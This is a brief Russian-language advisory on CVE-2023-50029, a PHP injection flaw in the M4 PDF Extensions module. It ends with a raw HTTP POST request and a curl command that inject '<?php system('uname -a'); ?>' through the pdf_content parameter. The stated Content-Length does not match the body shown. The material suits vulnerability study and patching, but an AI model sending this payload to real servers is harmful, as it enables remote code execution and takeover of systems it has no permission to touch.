
CVE-2023-50029: Уязвимость внедрения PHP в модуле M4 PDF Extensions
CVE-2023-50029 — это уязвимость внедрения PHP в модуле M4 PDF Extensions. Эта уязвимость позволяет атакующим внедрять и выполнять произвольный PHP-код на сервере, что дает им возможность получить полный контроль над целевой системой. Проблема заключается в неправильной проверке вводимых данных, что позволяет передавать вредоносный код через пользовательские параметры.
POST /generate_pdf.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
pdf_content=<?php system('uname -a'); ?>
curl -X POST http://example.com/generate_pdf.php -d "pdf_content=<?php system('uname -a'); ?>"